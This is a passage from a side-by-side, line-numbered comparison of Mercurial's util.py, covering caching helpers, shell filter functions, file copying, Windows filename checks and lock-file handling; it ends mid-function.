1179 head.prev.next = node
1177 node.prev = head.prev
1180 node.prev = head.prev
1178 node.next = head
1181 node.next = head
1179 head.prev = node
1182 head.prev = node
1180 self._size += 1
1183 self._size += 1
1181 return node
1184 return node
1182
1185
1183 def lrucachefunc(func):
1186 def lrucachefunc(func):
1184 '''cache most recent results of function calls'''
1187 '''cache most recent results of function calls'''
1185 cache = {}
1188 cache = {}
1186 order = collections.deque()
1189 order = collections.deque()
1187 if func.__code__.co_argcount == 1:
1190 if func.__code__.co_argcount == 1:
1188 def f(arg):
1191 def f(arg):
1189 if arg not in cache:
1192 if arg not in cache:
1190 if len(cache) > 20:
1193 if len(cache) > 20:
1191 del cache[order.popleft()]
1194 del cache[order.popleft()]
1192 cache[arg] = func(arg)
1195 cache[arg] = func(arg)
1193 else:
1196 else:
1194 order.remove(arg)
1197 order.remove(arg)
1195 order.append(arg)
1198 order.append(arg)
1196 return cache[arg]
1199 return cache[arg]
1197 else:
1200 else:
1198 def f(*args):
1201 def f(*args):
1199 if args not in cache:
1202 if args not in cache:
1200 if len(cache) > 20:
1203 if len(cache) > 20:
1201 del cache[order.popleft()]
1204 del cache[order.popleft()]
1202 cache[args] = func(*args)
1205 cache[args] = func(*args)
1203 else:
1206 else:
1204 order.remove(args)
1207 order.remove(args)
1205 order.append(args)
1208 order.append(args)
1206 return cache[args]
1209 return cache[args]
1207
1210
1208 return f
1211 return f
1209
1212
1210 class propertycache(object):
1213 class propertycache(object):
1211 def __init__(self, func):
1214 def __init__(self, func):
1212 self.func = func
1215 self.func = func
1213 self.name = func.__name__
1216 self.name = func.__name__
1214 def __get__(self, obj, type=None):
1217 def __get__(self, obj, type=None):
1215 result = self.func(obj)
1218 result = self.func(obj)
1216 self.cachevalue(obj, result)
1219 self.cachevalue(obj, result)
1217 return result
1220 return result
1218
1221
1219 def cachevalue(self, obj, value):
1222 def cachevalue(self, obj, value):
1220 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1223 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1221 obj.__dict__[self.name] = value
1224 obj.__dict__[self.name] = value
1222
1225
1223 def clearcachedproperty(obj, prop):
1226 def clearcachedproperty(obj, prop):
1224 '''clear a cached property value, if one has been set'''
1227 '''clear a cached property value, if one has been set'''
1225 if prop in obj.__dict__:
1228 if prop in obj.__dict__:
1226 del obj.__dict__[prop]
1229 del obj.__dict__[prop]
1227
1230
1228 def pipefilter(s, cmd):
1231 def pipefilter(s, cmd):
1229 '''filter string S through command CMD, returning its output'''
1232 '''filter string S through command CMD, returning its output'''
1230 p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1233 p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1231 stdin=subprocess.PIPE, stdout=subprocess.PIPE)
1234 stdin=subprocess.PIPE, stdout=subprocess.PIPE)
1232 pout, perr = p.communicate(s)
1235 pout, perr = p.communicate(s)
1233 return pout
1236 return pout
1234
1237
1235 def tempfilter(s, cmd):
1238 def tempfilter(s, cmd):
1236 '''filter string S through a pair of temporary files with CMD.
1239 '''filter string S through a pair of temporary files with CMD.
1237 CMD is used as a template to create the real command to be run,
1240 CMD is used as a template to create the real command to be run,
1238 with the strings INFILE and OUTFILE replaced by the real names of
1241 with the strings INFILE and OUTFILE replaced by the real names of
1239 the temporary files generated.'''
1242 the temporary files generated.'''
1240 inname, outname = None, None
1243 inname, outname = None, None
1241 try:
1244 try:
1242 infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
1245 infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
1243 fp = os.fdopen(infd, pycompat.sysstr('wb'))
1246 fp = os.fdopen(infd, pycompat.sysstr('wb'))
1244 fp.write(s)
1247 fp.write(s)
1245 fp.close()
1248 fp.close()
1246 outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
1249 outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
1247 os.close(outfd)
1250 os.close(outfd)
1248 cmd = cmd.replace('INFILE', inname)
1251 cmd = cmd.replace('INFILE', inname)
1249 cmd = cmd.replace('OUTFILE', outname)
1252 cmd = cmd.replace('OUTFILE', outname)
1250 code = os.system(cmd)
1253 code = os.system(cmd)
1251 if pycompat.sysplatform == 'OpenVMS' and code & 1:
1254 if pycompat.sysplatform == 'OpenVMS' and code & 1:
1252 code = 0
1255 code = 0
1253 if code:
1256 if code:
1254 raise Abort(_("command '%s' failed: %s") %
1257 raise Abort(_("command '%s' failed: %s") %
1255 (cmd, explainexit(code)))
1258 (cmd, explainexit(code)))
1256 return readfile(outname)
1259 return readfile(outname)
1257 finally:
1260 finally:
1258 try:
1261 try:
1259 if inname:
1262 if inname:
1260 os.unlink(inname)
1263 os.unlink(inname)
1261 except OSError:
1264 except OSError:
1262 pass
1265 pass
1263 try:
1266 try:
1264 if outname:
1267 if outname:
1265 os.unlink(outname)
1268 os.unlink(outname)
1266 except OSError:
1269 except OSError:
1267 pass
1270 pass
1268
1271
1269 filtertable = {
1272 filtertable = {
1270 'tempfile:': tempfilter,
1273 'tempfile:': tempfilter,
1271 'pipe:': pipefilter,
1274 'pipe:': pipefilter,
1272 }
1275 }
1273
1276
1274 def filter(s, cmd):
1277 def filter(s, cmd):
1275 "filter a string through a command that transforms its input to its output"
1278 "filter a string through a command that transforms its input to its output"
1276 for name, fn in filtertable.iteritems():
1279 for name, fn in filtertable.iteritems():
1277 if cmd.startswith(name):
1280 if cmd.startswith(name):
1278 return fn(s, cmd[len(name):].lstrip())
1281 return fn(s, cmd[len(name):].lstrip())
1279 return pipefilter(s, cmd)
1282 return pipefilter(s, cmd)
1280
1283
1281 def binary(s):
1284 def binary(s):
1282 """return true if a string is binary data"""
1285 """return true if a string is binary data"""
1283 return bool(s and '\0' in s)
1286 return bool(s and '\0' in s)
1284
1287
1285 def increasingchunks(source, min=1024, max=65536):
1288 def increasingchunks(source, min=1024, max=65536):
1286 '''return no less than min bytes per chunk while data remains,
1289 '''return no less than min bytes per chunk while data remains,
1287 doubling min after each chunk until it reaches max'''
1290 doubling min after each chunk until it reaches max'''
1288 def log2(x):
1291 def log2(x):
1289 if not x:
1292 if not x:
1290 return 0
1293 return 0
1291 i = 0
1294 i = 0
1292 while x:
1295 while x:
1293 x >>= 1
1296 x >>= 1
1294 i += 1
1297 i += 1
1295 return i - 1
1298 return i - 1
1296
1299
1297 buf = []
1300 buf = []
1298 blen = 0
1301 blen = 0
1299 for chunk in source:
1302 for chunk in source:
1300 buf.append(chunk)
1303 buf.append(chunk)
1301 blen += len(chunk)
1304 blen += len(chunk)
1302 if blen >= min:
1305 if blen >= min:
1303 if min < max:
1306 if min < max:
1304 min = min << 1
1307 min = min << 1
1305 nmin = 1 << log2(blen)
1308 nmin = 1 << log2(blen)
1306 if nmin > min:
1309 if nmin > min:
1307 min = nmin
1310 min = nmin
1308 if min > max:
1311 if min > max:
1309 min = max
1312 min = max
1310 yield ''.join(buf)
1313 yield ''.join(buf)
1311 blen = 0
1314 blen = 0
1312 buf = []
1315 buf = []
1313 if buf:
1316 if buf:
1314 yield ''.join(buf)
1317 yield ''.join(buf)
1315
1318
1316 Abort = error.Abort
1319 Abort = error.Abort
1317
1320
1318 def always(fn):
1321 def always(fn):
1319 return True
1322 return True
1320
1323
1321 def never(fn):
1324 def never(fn):
1322 return False
1325 return False
1323
1326
1324 def nogc(func):
1327 def nogc(func):
1325 """disable garbage collector
1328 """disable garbage collector
1326
1329
1327 Python's garbage collector triggers a GC each time a certain number of
1330 Python's garbage collector triggers a GC each time a certain number of
1328 container objects (the number being defined by gc.get_threshold()) are
1331 container objects (the number being defined by gc.get_threshold()) are
1329 allocated even when marked not to be tracked by the collector. Tracking has
1332 allocated even when marked not to be tracked by the collector. Tracking has
1330 no effect on when GCs are triggered, only on what objects the GC looks
1333 no effect on when GCs are triggered, only on what objects the GC looks
1331 into. As a workaround, disable GC while building complex (huge)
1334 into. As a workaround, disable GC while building complex (huge)
1332 containers.
1335 containers.
1333
1336
1334 This garbage collector issue have been fixed in 2.7. But it still affect
1337 This garbage collector issue have been fixed in 2.7. But it still affect
1335 CPython's performance.
1338 CPython's performance.
1336 """
1339 """
1337 def wrapper(*args, **kwargs):
1340 def wrapper(*args, **kwargs):
1338 gcenabled = gc.isenabled()
1341 gcenabled = gc.isenabled()
1339 gc.disable()
1342 gc.disable()
1340 try:
1343 try:
1341 return func(*args, **kwargs)
1344 return func(*args, **kwargs)
1342 finally:
1345 finally:
1343 if gcenabled:
1346 if gcenabled:
1344 gc.enable()
1347 gc.enable()
1345 return wrapper
1348 return wrapper
1346
1349
1347 if pycompat.ispypy:
1350 if pycompat.ispypy:
1348 # PyPy runs slower with gc disabled
1351 # PyPy runs slower with gc disabled
1349 nogc = lambda x: x
1352 nogc = lambda x: x
1350
1353
1351 def pathto(root, n1, n2):
1354 def pathto(root, n1, n2):
1352 '''return the relative path from one place to another.
1355 '''return the relative path from one place to another.
1353 root should use os.sep to separate directories
1356 root should use os.sep to separate directories
1354 n1 should use os.sep to separate directories
1357 n1 should use os.sep to separate directories
1355 n2 should use "/" to separate directories
1358 n2 should use "/" to separate directories
1356 returns an os.sep-separated path.
1359 returns an os.sep-separated path.
1357
1360
1358 If n1 is a relative path, it's assumed it's
1361 If n1 is a relative path, it's assumed it's
1359 relative to root.
1362 relative to root.
1360 n2 should always be relative to root.
1363 n2 should always be relative to root.
1361 '''
1364 '''
1362 if not n1:
1365 if not n1:
1363 return localpath(n2)
1366 return localpath(n2)
1364 if os.path.isabs(n1):
1367 if os.path.isabs(n1):
1365 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1368 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1366 return os.path.join(root, localpath(n2))
1369 return os.path.join(root, localpath(n2))
1367 n2 = '/'.join((pconvert(root), n2))
1370 n2 = '/'.join((pconvert(root), n2))
1368 a, b = splitpath(n1), n2.split('/')
1371 a, b = splitpath(n1), n2.split('/')
1369 a.reverse()
1372 a.reverse()
1370 b.reverse()
1373 b.reverse()
1371 while a and b and a[-1] == b[-1]:
1374 while a and b and a[-1] == b[-1]:
1372 a.pop()
1375 a.pop()
1373 b.pop()
1376 b.pop()
1374 b.reverse()
1377 b.reverse()
1375 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1378 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1376
1379
1377 def mainfrozen():
1380 def mainfrozen():
1378 """return True if we are a frozen executable.
1381 """return True if we are a frozen executable.
1379
1382
1380 The code supports py2exe (most common, Windows only) and tools/freeze
1383 The code supports py2exe (most common, Windows only) and tools/freeze
1381 (portable, not much used).
1384 (portable, not much used).
1382 """
1385 """
1383 return (safehasattr(sys, "frozen") or # new py2exe
1386 return (safehasattr(sys, "frozen") or # new py2exe
1384 safehasattr(sys, "importers") or # old py2exe
1387 safehasattr(sys, "importers") or # old py2exe
1385 imp.is_frozen(u"__main__")) # tools/freeze
1388 imp.is_frozen(u"__main__")) # tools/freeze
1386
1389
1387 # the location of data files matching the source code
1390 # the location of data files matching the source code
1388 if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1391 if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1389 # executable version (py2exe) doesn't support __file__
1392 # executable version (py2exe) doesn't support __file__
1390 datapath = os.path.dirname(pycompat.sysexecutable)
1393 datapath = os.path.dirname(pycompat.sysexecutable)
1391 else:
1394 else:
1392 datapath = os.path.dirname(pycompat.fsencode(__file__))
1395 datapath = os.path.dirname(pycompat.fsencode(__file__))
1393
1396
1394 i18n.setdatapath(datapath)
1397 i18n.setdatapath(datapath)
1395
1398
1396 _hgexecutable = None
1399 _hgexecutable = None
1397
1400
1398 def hgexecutable():
1401 def hgexecutable():
1399 """return location of the 'hg' executable.
1402 """return location of the 'hg' executable.
1400
1403
1401 Defaults to $HG or 'hg' in the search path.
1404 Defaults to $HG or 'hg' in the search path.
1402 """
1405 """
1403 if _hgexecutable is None:
1406 if _hgexecutable is None:
1404 hg = encoding.environ.get('HG')
1407 hg = encoding.environ.get('HG')
1405 mainmod = sys.modules[pycompat.sysstr('__main__')]
1408 mainmod = sys.modules[pycompat.sysstr('__main__')]
1406 if hg:
1409 if hg:
1407 _sethgexecutable(hg)
1410 _sethgexecutable(hg)
1408 elif mainfrozen():
1411 elif mainfrozen():
1409 if getattr(sys, 'frozen', None) == 'macosx_app':
1412 if getattr(sys, 'frozen', None) == 'macosx_app':
1410 # Env variable set by py2app
1413 # Env variable set by py2app
1411 _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
1414 _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
1412 else:
1415 else:
1413 _sethgexecutable(pycompat.sysexecutable)
1416 _sethgexecutable(pycompat.sysexecutable)
1414 elif (os.path.basename(
1417 elif (os.path.basename(
1415 pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
1418 pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
1416 _sethgexecutable(pycompat.fsencode(mainmod.__file__))
1419 _sethgexecutable(pycompat.fsencode(mainmod.__file__))
1417 else:
1420 else:
1418 exe = findexe('hg') or os.path.basename(sys.argv[0])
1421 exe = findexe('hg') or os.path.basename(sys.argv[0])
1419 _sethgexecutable(exe)
1422 _sethgexecutable(exe)
1420 return _hgexecutable
1423 return _hgexecutable
1421
1424
1422 def _sethgexecutable(path):
1425 def _sethgexecutable(path):
1423 """set location of the 'hg' executable"""
1426 """set location of the 'hg' executable"""
1424 global _hgexecutable
1427 global _hgexecutable
1425 _hgexecutable = path
1428 _hgexecutable = path
1426
1429
1427 def _isstdout(f):
1430 def _isstdout(f):
1428 fileno = getattr(f, 'fileno', None)
1431 fileno = getattr(f, 'fileno', None)
1429 try:
1432 try:
1430 return fileno and fileno() == sys.__stdout__.fileno()
1433 return fileno and fileno() == sys.__stdout__.fileno()
1431 except io.UnsupportedOperation:
1434 except io.UnsupportedOperation:
1432 return False # fileno() raised UnsupportedOperation
1435 return False # fileno() raised UnsupportedOperation
1433
1436
1434 def shellenviron(environ=None):
1437 def shellenviron(environ=None):
1435 """return environ with optional override, useful for shelling out"""
1438 """return environ with optional override, useful for shelling out"""
1436 def py2shell(val):
1439 def py2shell(val):
1437 'convert python object into string that is useful to shell'
1440 'convert python object into string that is useful to shell'
1438 if val is None or val is False:
1441 if val is None or val is False:
1439 return '0'
1442 return '0'
1440 if val is True:
1443 if val is True:
1441 return '1'
1444 return '1'
1442 return pycompat.bytestr(val)
1445 return pycompat.bytestr(val)
1443 env = dict(encoding.environ)
1446 env = dict(encoding.environ)
1444 if environ:
1447 if environ:
1445 env.update((k, py2shell(v)) for k, v in environ.iteritems())
1448 env.update((k, py2shell(v)) for k, v in environ.iteritems())
1446 env['HG'] = hgexecutable()
1449 env['HG'] = hgexecutable()
1447 return env
1450 return env
1448
1451
1449 def system(cmd, environ=None, cwd=None, out=None):
1452 def system(cmd, environ=None, cwd=None, out=None):
1450 '''enhanced shell command execution.
1453 '''enhanced shell command execution.
1451 run with environment maybe modified, maybe in different dir.
1454 run with environment maybe modified, maybe in different dir.
1452
1455
1453 if out is specified, it is assumed to be a file-like object that has a
1456 if out is specified, it is assumed to be a file-like object that has a
1454 write() method. stdout and stderr will be redirected to out.'''
1457 write() method. stdout and stderr will be redirected to out.'''
1455 try:
1458 try:
1456 stdout.flush()
1459 stdout.flush()
1457 except Exception:
1460 except Exception:
1458 pass
1461 pass
1459 cmd = quotecommand(cmd)
1462 cmd = quotecommand(cmd)
1460 env = shellenviron(environ)
1463 env = shellenviron(environ)
1461 if out is None or _isstdout(out):
1464 if out is None or _isstdout(out):
1462 rc = subprocess.call(cmd, shell=True, close_fds=closefds,
1465 rc = subprocess.call(cmd, shell=True, close_fds=closefds,
1463 env=env, cwd=cwd)
1466 env=env, cwd=cwd)
1464 else:
1467 else:
1465 proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1468 proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1466 env=env, cwd=cwd, stdout=subprocess.PIPE,
1469 env=env, cwd=cwd, stdout=subprocess.PIPE,
1467 stderr=subprocess.STDOUT)
1470 stderr=subprocess.STDOUT)
1468 for line in iter(proc.stdout.readline, ''):
1471 for line in iter(proc.stdout.readline, ''):
1469 out.write(line)
1472 out.write(line)
1470 proc.wait()
1473 proc.wait()
1471 rc = proc.returncode
1474 rc = proc.returncode
1472 if pycompat.sysplatform == 'OpenVMS' and rc & 1:
1475 if pycompat.sysplatform == 'OpenVMS' and rc & 1:
1473 rc = 0
1476 rc = 0
1474 return rc
1477 return rc
1475
1478
1476 def checksignature(func):
1479 def checksignature(func):
1477 '''wrap a function with code to check for calling errors'''
1480 '''wrap a function with code to check for calling errors'''
1478 def check(*args, **kwargs):
1481 def check(*args, **kwargs):
1479 try:
1482 try:
1480 return func(*args, **kwargs)
1483 return func(*args, **kwargs)
1481 except TypeError:
1484 except TypeError:
1482 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1485 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1483 raise error.SignatureError
1486 raise error.SignatureError
1484 raise
1487 raise
1485
1488
1486 return check
1489 return check
1487
1490
1488 # a whilelist of known filesystems where hardlink works reliably
1491 # a whilelist of known filesystems where hardlink works reliably
1489 _hardlinkfswhitelist = {
1492 _hardlinkfswhitelist = {
1490 'btrfs',
1493 'btrfs',
1491 'ext2',
1494 'ext2',
1492 'ext3',
1495 'ext3',
1493 'ext4',
1496 'ext4',
1494 'hfs',
1497 'hfs',
1495 'jfs',
1498 'jfs',
1496 'NTFS',
1499 'NTFS',
1497 'reiserfs',
1500 'reiserfs',
1498 'tmpfs',
1501 'tmpfs',
1499 'ufs',
1502 'ufs',
1500 'xfs',
1503 'xfs',
1501 'zfs',
1504 'zfs',
1502 }
1505 }
1503
1506
1504 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1507 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1505 '''copy a file, preserving mode and optionally other stat info like
1508 '''copy a file, preserving mode and optionally other stat info like
1506 atime/mtime
1509 atime/mtime
1507
1510
1508 checkambig argument is used with filestat, and is useful only if
1511 checkambig argument is used with filestat, and is useful only if
1509 destination file is guarded by any lock (e.g. repo.lock or
1512 destination file is guarded by any lock (e.g. repo.lock or
1510 repo.wlock).
1513 repo.wlock).
1511
1514
1512 copystat and checkambig should be exclusive.
1515 copystat and checkambig should be exclusive.
1513 '''
1516 '''
1514 assert not (copystat and checkambig)
1517 assert not (copystat and checkambig)
1515 oldstat = None
1518 oldstat = None
1516 if os.path.lexists(dest):
1519 if os.path.lexists(dest):
1517 if checkambig:
1520 if checkambig:
1518 oldstat = checkambig and filestat.frompath(dest)
1521 oldstat = checkambig and filestat.frompath(dest)
1519 unlink(dest)
1522 unlink(dest)
1520 if hardlink:
1523 if hardlink:
1521 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1524 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1522 # unless we are confident that dest is on a whitelisted filesystem.
1525 # unless we are confident that dest is on a whitelisted filesystem.
1523 try:
1526 try:
1524 fstype = getfstype(os.path.dirname(dest))
1527 fstype = getfstype(os.path.dirname(dest))
1525 except OSError:
1528 except OSError:
1526 fstype = None
1529 fstype = None
1527 if fstype not in _hardlinkfswhitelist:
1530 if fstype not in _hardlinkfswhitelist:
1528 hardlink = False
1531 hardlink = False
1529 if hardlink:
1532 if hardlink:
1530 try:
1533 try:
1531 oslink(src, dest)
1534 oslink(src, dest)
1532 return
1535 return
1533 except (IOError, OSError):
1536 except (IOError, OSError):
1534 pass # fall back to normal copy
1537 pass # fall back to normal copy
1535 if os.path.islink(src):
1538 if os.path.islink(src):
1536 os.symlink(os.readlink(src), dest)
1539 os.symlink(os.readlink(src), dest)
1537 # copytime is ignored for symlinks, but in general copytime isn't needed
1540 # copytime is ignored for symlinks, but in general copytime isn't needed
1538 # for them anyway
1541 # for them anyway
1539 else:
1542 else:
1540 try:
1543 try:
1541 shutil.copyfile(src, dest)
1544 shutil.copyfile(src, dest)
1542 if copystat:
1545 if copystat:
1543 # copystat also copies mode
1546 # copystat also copies mode
1544 shutil.copystat(src, dest)
1547 shutil.copystat(src, dest)
1545 else:
1548 else:
1546 shutil.copymode(src, dest)
1549 shutil.copymode(src, dest)
1547 if oldstat and oldstat.stat:
1550 if oldstat and oldstat.stat:
1548 newstat = filestat.frompath(dest)
1551 newstat = filestat.frompath(dest)
1549 if newstat.isambig(oldstat):
1552 if newstat.isambig(oldstat):
1550 # stat of copied file is ambiguous to original one
1553 # stat of copied file is ambiguous to original one
1551 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1554 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1552 os.utime(dest, (advanced, advanced))
1555 os.utime(dest, (advanced, advanced))
1553 except shutil.Error as inst:
1556 except shutil.Error as inst:
1554 raise Abort(str(inst))
1557 raise Abort(str(inst))
1555
1558
1556 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1559 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1557 """Copy a directory tree using hardlinks if possible."""
1560 """Copy a directory tree using hardlinks if possible."""
1558 num = 0
1561 num = 0
1559
1562
1560 gettopic = lambda: hardlink and _('linking') or _('copying')
1563 gettopic = lambda: hardlink and _('linking') or _('copying')
1561
1564
1562 if os.path.isdir(src):
1565 if os.path.isdir(src):
1563 if hardlink is None:
1566 if hardlink is None:
1564 hardlink = (os.stat(src).st_dev ==
1567 hardlink = (os.stat(src).st_dev ==
1565 os.stat(os.path.dirname(dst)).st_dev)
1568 os.stat(os.path.dirname(dst)).st_dev)
1566 topic = gettopic()
1569 topic = gettopic()
1567 os.mkdir(dst)
1570 os.mkdir(dst)
1568 for name, kind in listdir(src):
1571 for name, kind in listdir(src):
1569 srcname = os.path.join(src, name)
1572 srcname = os.path.join(src, name)
1570 dstname = os.path.join(dst, name)
1573 dstname = os.path.join(dst, name)
1571 def nprog(t, pos):
1574 def nprog(t, pos):
1572 if pos is not None:
1575 if pos is not None:
1573 return progress(t, pos + num)
1576 return progress(t, pos + num)
1574 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1577 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1575 num += n
1578 num += n
1576 else:
1579 else:
1577 if hardlink is None:
1580 if hardlink is None:
1578 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1581 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1579 os.stat(os.path.dirname(dst)).st_dev)
1582 os.stat(os.path.dirname(dst)).st_dev)
1580 topic = gettopic()
1583 topic = gettopic()
1581
1584
1582 if hardlink:
1585 if hardlink:
1583 try:
1586 try:
1584 oslink(src, dst)
1587 oslink(src, dst)
1585 except (IOError, OSError):
1588 except (IOError, OSError):
1586 hardlink = False
1589 hardlink = False
1587 shutil.copy(src, dst)
1590 shutil.copy(src, dst)
1588 else:
1591 else:
1589 shutil.copy(src, dst)
1592 shutil.copy(src, dst)
1590 num += 1
1593 num += 1
1591 progress(topic, num)
1594 progress(topic, num)
1592 progress(topic, None)
1595 progress(topic, None)
1593
1596
1594 return hardlink, num
1597 return hardlink, num
1595
1598
1596 _winreservednames = {
1599 _winreservednames = {
1597 'con', 'prn', 'aux', 'nul',
1600 'con', 'prn', 'aux', 'nul',
1598 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1601 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1599 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1602 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1600 }
1603 }
1601 _winreservedchars = ':*?"<>|'
1604 _winreservedchars = ':*?"<>|'
1602 def checkwinfilename(path):
1605 def checkwinfilename(path):
1603 r'''Check that the base-relative path is a valid filename on Windows.
1606 r'''Check that the base-relative path is a valid filename on Windows.
1604 Returns None if the path is ok, or a UI string describing the problem.
1607 Returns None if the path is ok, or a UI string describing the problem.
1605
1608
1606 >>> checkwinfilename(b"just/a/normal/path")
1609 >>> checkwinfilename(b"just/a/normal/path")
1607 >>> checkwinfilename(b"foo/bar/con.xml")
1610 >>> checkwinfilename(b"foo/bar/con.xml")
1608 "filename contains 'con', which is reserved on Windows"
1611 "filename contains 'con', which is reserved on Windows"
1609 >>> checkwinfilename(b"foo/con.xml/bar")
1612 >>> checkwinfilename(b"foo/con.xml/bar")
1610 "filename contains 'con', which is reserved on Windows"
1613 "filename contains 'con', which is reserved on Windows"
1611 >>> checkwinfilename(b"foo/bar/xml.con")
1614 >>> checkwinfilename(b"foo/bar/xml.con")
1612 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1615 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1613 "filename contains 'AUX', which is reserved on Windows"
1616 "filename contains 'AUX', which is reserved on Windows"
1614 >>> checkwinfilename(b"foo/bar/bla:.txt")
1617 >>> checkwinfilename(b"foo/bar/bla:.txt")
1615 "filename contains ':', which is reserved on Windows"
1618 "filename contains ':', which is reserved on Windows"
1616 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1619 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1617 "filename contains '\\x07', which is invalid on Windows"
1620 "filename contains '\\x07', which is invalid on Windows"
1618 >>> checkwinfilename(b"foo/bar/bla ")
1621 >>> checkwinfilename(b"foo/bar/bla ")
1619 "filename ends with ' ', which is not allowed on Windows"
1622 "filename ends with ' ', which is not allowed on Windows"
1620 >>> checkwinfilename(b"../bar")
1623 >>> checkwinfilename(b"../bar")
1621 >>> checkwinfilename(b"foo\\")
1624 >>> checkwinfilename(b"foo\\")
1622 "filename ends with '\\', which is invalid on Windows"
1625 "filename ends with '\\', which is invalid on Windows"
1623 >>> checkwinfilename(b"foo\\/bar")
1626 >>> checkwinfilename(b"foo\\/bar")
1624 "directory name ends with '\\', which is invalid on Windows"
1627 "directory name ends with '\\', which is invalid on Windows"
1625 '''
1628 '''
1626 if path.endswith('\\'):
1629 if path.endswith('\\'):
1627 return _("filename ends with '\\', which is invalid on Windows")
1630 return _("filename ends with '\\', which is invalid on Windows")
1628 if '\\/' in path:
1631 if '\\/' in path:
1629 return _("directory name ends with '\\', which is invalid on Windows")
1632 return _("directory name ends with '\\', which is invalid on Windows")
1630 for n in path.replace('\\', '/').split('/'):
1633 for n in path.replace('\\', '/').split('/'):
1631 if not n:
1634 if not n:
1632 continue
1635 continue
1633 for c in _filenamebytestr(n):
1636 for c in _filenamebytestr(n):
1634 if c in _winreservedchars:
1637 if c in _winreservedchars:
1635 return _("filename contains '%s', which is reserved "
1638 return _("filename contains '%s', which is reserved "
1636 "on Windows") % c
1639 "on Windows") % c
1637 if ord(c) <= 31:
1640 if ord(c) <= 31:
1638 return _("filename contains '%s', which is invalid "
1641 return _("filename contains '%s', which is invalid "
1639 "on Windows") % escapestr(c)
1642 "on Windows") % escapestr(c)
1640 base = n.split('.')[0]
1643 base = n.split('.')[0]
1641 if base and base.lower() in _winreservednames:
1644 if base and base.lower() in _winreservednames:
1642 return _("filename contains '%s', which is reserved "
1645 return _("filename contains '%s', which is reserved "
1643 "on Windows") % base
1646 "on Windows") % base
1644 t = n[-1:]
1647 t = n[-1:]
1645 if t in '. ' and n not in '..':
1648 if t in '. ' and n not in '..':
1646 return _("filename ends with '%s', which is not allowed "
1649 return _("filename ends with '%s', which is not allowed "
1647 "on Windows") % t
1650 "on Windows") % t
1648
1651
1649 if pycompat.iswindows:
1652 if pycompat.iswindows:
1650 checkosfilename = checkwinfilename
1653 checkosfilename = checkwinfilename
1651 timer = time.clock
1654 timer = time.clock
1652 else:
1655 else:
1653 checkosfilename = platform.checkosfilename
1656 checkosfilename = platform.checkosfilename
1654 timer = time.time
1657 timer = time.time
1655
1658
1656 if safehasattr(time, "perf_counter"):
1659 if safehasattr(time, "perf_counter"):
1657 timer = time.perf_counter
1660 timer = time.perf_counter
1658
1661
1659 def makelock(info, pathname):
1662 def makelock(info, pathname):
1660 try:
1663 try:
1661 return os.symlink(info, pathname)
1664 return os.symlink(info, pathname)
1662 except OSError as why:
1665 except OSError as why:
1663 if why.errno == errno.EEXIST:
1666 if why.errno == errno.EEXIST:
1664 raise
1667 raise
1665 except AttributeError: # no symlink in os
1668 except AttributeError: # no symlink in os
1666 pass
1669 pass
1667
1670
1668 ld = os.open(pathname, os.O_CREAT | os.O_WRONLY | os.O_EXCL)
1671 ld = os.open(pathname, os.O_CREAT | os.O_WRONLY | os.O_EXCL)
1669 os.write(ld, info)
1672 os.write(ld, info)
1670 os.close(ld)
1673 os.close(ld)
1671
1674
1672 def readlock(pathname):
1675 def readlock(pathname):
1673 try:
1676 try:
1674 return os.readlink(pathname)
1677 return os.readlink(pathname)
1675 except OSError as why:
1678 except OSError as why:
1676 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1679 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1677 raise
1680 raise
1678 except AttributeError: # no symlink in os
1681 except AttributeError: # no symlink in os
1679 pass
1682 pass
1680 fp = posixfile(pathname)
1683 fp = posixfile(pathname)
1681 r = fp.read()
1684 r = fp.read()
1682 fp.close()
1685 fp.close()
1683 return r
1686 return r
1684
1687
1685 def fstat(fp):
1688 def fstat(fp):
1686 '''stat file object that may not have fileno method.'''
1689 '''stat file object that may not have fileno method.'''
1687 try:
1690 try:
1688 return os.fstat(fp.fileno())
1691 return os.fstat(fp.fileno())
1689 except AttributeError:
